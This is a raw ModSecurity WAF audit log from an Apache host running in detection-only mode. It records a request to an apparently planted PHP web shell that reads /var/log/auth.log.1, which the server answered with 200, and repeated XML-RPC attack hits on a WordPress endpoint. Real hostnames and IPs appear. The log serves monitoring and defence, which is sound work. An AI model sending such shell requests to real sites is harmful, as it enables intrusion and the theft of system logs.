Engine-Mode: "DETECTION_ONLY" --fdb33874-Z-- --ab4c536b-A-- [15/Jun/2025:23:09:08.457000 +0530] aE8FPL59833JshVCMq_ihgAAAAY 216.73.216.83 32990 127.0.0.1 7081 --ab4c536b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fvar%2Flog&viewfile=%2F%2Fvar%2Flog%2Fauth.log.1 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --ab4c536b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2946 Connection: close Content-Type: text/html; charset=UTF-8 --ab4c536b-H-- Message: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE8FPL59833JshVCMq_ihgAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750009148452779 4276 (- - -) Stopwatch2: 1750009148452779 4276; combined=2262, p1=334, p2=1794, p3=40, p4=34, p5=60, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ab4c536b-Z-- --0ac69a55-A-- [15/Jun/2025:23:09:10.994598 +0530] aE8FPqrcvwHXckZU_xqUVgAAAAM 128.199.112.101 39092 127.0.0.1 7081 --0ac69a55-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --0ac69a55-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --0ac69a55-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8FPqrcvwHXckZU_xqUVgAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750009150039383 955272 (- - -) Stopwatch2: 1750009150039383 955272; combined=2152, p1=355, p2=1379, p3=43, p4=73, p5=189, sr=95, sw=113, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0ac69a55-Z-- --aa0cdd74-A-- [15/Jun/2025:23:10:11.476326 +0530] aE8FekmAj8yxyFrMChh2cgAAAAE 128.199.112.101 37436 127.0.0.1 7081 --aa0cdd74-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --aa0cdd74-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --aa0cdd74-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8FekmAj8yxyFrMChh2cgAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750009210535455 940939 (- - -) Stopwatch2: 1750009210535455 940939; combined=2169, p1=405, p2=1345, p3=41, p4=73, p5=189, sr=103, sw=116, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --aa0cdd74-Z--